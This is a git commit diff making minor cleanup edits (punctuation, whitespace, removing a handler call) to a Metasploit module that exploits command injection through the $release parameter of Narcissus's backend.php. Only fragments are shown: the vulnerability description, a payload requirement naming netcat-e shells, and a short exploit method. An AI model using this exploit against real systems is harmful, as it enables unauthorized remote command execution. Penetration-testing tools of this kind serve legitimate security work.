final cleanup
This commit is contained in:
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
super(update_info(info,
|
||||
'Name' => "Narcissus Image Configuration Passthru Vulnerability",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Narcissus' image configuration
|
||||
This module exploits a vulnerability found in Narcissus image configuration
|
||||
function. This is due to the backend.php file not handling the $release parameter
|
||||
properly, and then passes it on to the configure_image() function. In this
|
||||
function, the $release parameter can be used to inject system commands for
|
||||
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl ruby python bash netcat-e'
|
||||
},
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
['Narcissus', {}]
|
||||
@@ -104,7 +104,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def exploit
|
||||
print_status("#{peer} - Sending malicious request...")
|
||||
remote_exe(payload.encoded)
|
||||
handler
|
||||
end
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user